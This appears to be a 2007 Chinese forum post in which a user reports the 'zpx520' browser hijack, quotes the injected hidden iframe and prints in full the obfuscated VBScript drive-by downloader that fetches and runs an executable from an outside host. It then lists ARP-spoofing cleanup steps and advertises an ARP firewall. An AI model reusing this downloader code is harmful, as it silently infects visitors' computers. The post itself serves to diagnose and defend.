zpx520 病毒
在我的流览器中,打开163.com等很多网站查看网页源码都出现这一行。应该是本地劫持放到浏览器中的。<iframe src='
http://www.zpx520.com/0.htm' width=0 height=0></iframe>
不管是maxthon还是firefox都是一样的。查看了
http://q.zpx520.com/1.htm网站的源码,如下:
<SCRIPT language=VBS>
'1 xiaohui's Script
'2 update 2007.2.24
'1
ps="Begin game ^O^"
'1
On Error Resume Next
'1
https="htt"&"p://"&"w.zpx520.com/0.exe"
'1
pso= "ob"&"je"&"ct"
'1
Set Pj=document.createElement(pso)
'1
Pj.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-11D0-98"&"3A-00C04"&"FC29E36"
'1
Set PS1=Pj.CreateObject("Mic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'1
PS1.Open "G"&"ET", https, False
'1
PS1.Send
'1
ExeName="commomd.pif"
'1
VbsName="run.vbs"
'1
Set PS2=Pj.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'1
Set PS3=PS2.GetSpecialFolder(2)
'1
ExeName=PS2.BuildPath(PS3,ExeName)
'1
VbsName=PS2.BuildPath(PS3,VbsName)
'1
AA="A"&"d"
'1
BB="o"&"d"&"b"&"."&"s"&"tre"&"am"
'1
DC=AA&BB
'1
Set XBOX=Pj.createobject(DC,"")
'1
XBOX.type=1
'1
XBOX.Open
'1
XBOX.Write PS1.ResponseBody
'1
XBOX.Savetofile ExeName,2
'1
XBOX.Close
'1
XBOX.Type=2
'1
XBOX.Open
'1
XBOX.WriteText "Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set ws=Nothing"
'1
XBOX.Savetofile VbsName,2
'1
XBOX.Close
'1
GBA="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
'1
Set Run=Pj.createobject(GBA&"cation","")
'2
Run.ShellExecute VbsName,"","","Open",0
'3
ps="The end ^O^"
</SCRIPT>
发现了这行,htt"&"p://"&"w.zpx520.com/0.exe
不管打开哪个网站都弹出JS错误信息:
这个病毒真事牛B,如果没补丁的话,其中一台中了,会导致整个局域网内所有电脑中毒,并在交换机上修改所有的ip的mac地址为中毒的mac地址.
本人处理的方法为:
1.有防火墙的或者有路由器的,直接把q.zpx520.com地址给限制访问
2.要求局域网内的都不要访问网页
3.在cmd里面输入arp -a寻找正在连接你电脑的ip地址最好用arp -d清除后在看,好定位哪台中标了
4.关掉或者拔掉网线中标的电脑
5.手动删除所有可疑进程,确保其不在发送报文,病毒好像没绑定感染,可以清除,具体位置不大清楚了
6.打上微软新出的补丁kb925902
困扰好几天了,今天安了AntiARP,终于好了。下面的分析结果时间:2007-5-21 下午 02:39:43IP地址:192.168.0.9MAC地址:00-E0-4C-FE-BE-ED网关IP地址:192.168.0.1网关MAC地址:00-90-D0-84-B9-FF欺骗机MAC地址:00-0A-EB-0D-8F-6F欺骗机IP:未知累计:56***********HTTP://WWW.AntiARP.COM*************时间:2007-5-21 下午 02:43:00IP地址:192.168.0.9MAC地址:00-E0-4C-FE-BE-ED网关IP地址:192.168.0.1网关MAC地址:00-90-D0-84-B9-FF欺骗机MAC地址:00-E0-4C-EE-E9-B0欺骗机IP:未知累计:2343***********HTTP://WWW.AntiARP.COM*************时间:2007-5-21 下午 02:35:34IP地址:192.168.0.9MAC地址:00-E0-4C-FE-BE-ED网关IP地址:192.168.0.1网关MA
你的网络是否经常掉线,是否经常发生IP冲突?
你是否担心通讯数据受到监控(如MSN、QQ、EMAIL)?
你的网络速度是否受到网管软件限制(如聚生网管、P2P终结者)?
你是否深受各种ARP攻击软件之苦(如网络执法官、网络剪刀手、局域网终结者)?
以上各种问题的根源都是ARP欺骗(ARP攻击)。在没有ARP欺骗之前,数据流向是这样的:网关<->本机。ARP欺骗之后,数据流向是这样的:网关<->攻击者(“网管”)<->本机,本机与网关之间的所有通讯数据都将流经攻击者(“网管”),所以“任人宰割”就在所难免了。
ARP防火墙通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址,可以保障数据流向正确,不经过第三者,从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制,从而完美的解决上述所有问题。
ARP防火墙九大功能
1. 拦截ARP攻击。
(A) 在系统内核层拦截外部虚假ARP数据包,保障系统不受ARP欺骗、ARP攻击影响,保持网络畅通及通讯安全;
(B) 在系统内核层拦截本机对外的ARP攻击数据包,以减少感染恶意程序后对外攻击给用户带来的麻烦;
2. 拦截IP冲突。在系统内核层拦截IP冲突数据包,保障系统不受IP冲突攻击的影响;
3. Dos攻击抑制。在系统内核层拦截本机对外的TCP SYN/UDP/ICMP/ARP DoS攻击数据包,定位恶意发动DoS攻击的程序,从而保证网络的畅通;
4. 安全模式。除了网关外,不响应其它机器发送的ARP Request,达到隐身效果,减少受到ARP攻击的几率;
5. ARP数据分析。分析本机接收到的所有ARP数据包,掌握网络动态,找出潜在的攻击者或中毒的机器;
6. 监测ARP缓存。自动监测本机ARP缓存表,如发现网关MAC地址被恶意程序篡改,将报警并自动修复,以保持网络畅通及通讯安全;
7. 主动防御。主动与网关保持通讯,通告网关正确的MAC地址,以保持网络畅通及通讯安全;
8. 追踪攻击者。发现攻击行为后,自动快速锁定攻击者IP地址;
9. 查杀ARP病毒。发现本机有对外攻击行为时,自动定位本机感染的恶意程序、病毒程序;
在安装arp防火墙后,防火墙启动失败,错误代码1/183